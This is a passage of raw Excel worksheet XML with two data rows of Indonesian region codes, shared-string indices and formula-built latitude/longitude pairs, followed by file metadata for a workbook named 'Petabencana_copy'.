        <v>3172040005</v>
      </c>
      <c r="N4203">
        <v>3172040</v>
      </c>
      <c r="O4203">
        <v>3172</v>
      </c>
      <c r="P4203">
        <v>31</v>
      </c>
      <c r="Q4203" t="s">
        <v>1351</v>
      </c>
      <c r="R4203" t="s">
        <v>281</v>
      </c>
      <c r="S4203" t="s">
        <v>49</v>
      </c>
      <c r="T4203" t="s">
        <v>33</v>
      </c>
      <c r="U4203" s="5">
        <v>1069163134</v>
      </c>
      <c r="V4203" s="5" t="s">
        <v>18264</v>
      </c>
      <c r="W4203" s="5">
        <v>-62516120</v>
      </c>
      <c r="X4203" t="s">
        <v>21997</v>
      </c>
      <c r="Y4203" t="str">
        <f t="shared" si="65"/>
        <v>-6.2516120,106.9163134</v>
      </c>
    </row>
    <row r="4204" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A4204">
        <v>299728</v>
      </c>
      <c r="B4204" s="1">
        <v>44560</v>
      </c>
      <c r="C4204" t="s">
        <v>14422</v>
      </c>
      <c r="D4204" t="s">
        <v>22</v>
      </c>
      <c r="E4204" t="s">
        <v>23</v>
      </c>
      <c r="F4204" t="s">
        <v>14423</v>
      </c>
      <c r="G4204" t="s">
        <v>14424</v>
      </c>
      <c r="H4204" t="s">
        <v>26</v>
      </c>
      <c r="I4204" t="s">
        <v>1447</v>
      </c>
      <c r="J4204" t="s">
        <v>7277</v>
      </c>
      <c r="L4204" t="s">
        <v>14425</v>
      </c>
      <c r="M4204">
        <v>5102040015</v>
      </c>
      <c r="N4204">
        <v>5102040</v>
      </c>
      <c r="O4204">
        <v>5102</v>
      </c>
      <c r="P4204">
        <v>51</v>
      </c>
      <c r="Q4204" t="s">
        <v>14426</v>
      </c>
      <c r="R4204" t="s">
        <v>8365</v>
      </c>
      <c r="S4204" t="s">
        <v>13156</v>
      </c>
      <c r="T4204" t="s">
        <v>7282</v>
      </c>
      <c r="U4204" s="5">
        <v>1151423004</v>
      </c>
      <c r="V4204" s="5" t="s">
        <v>18265</v>
      </c>
      <c r="W4204" s="5">
        <v>-85540953</v>
      </c>
      <c r="X4204" t="s">
        <v>21998</v>
      </c>
      <c r="Y4204" t="str">
        <f t="shared" si="65"/>
        <v>-8.5540953,115.1423004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Petabencana_copy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2022-02-04T13:31:41Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-04T18:03:50Z</dcterms:modified>
</cp:coreProperties>
</file>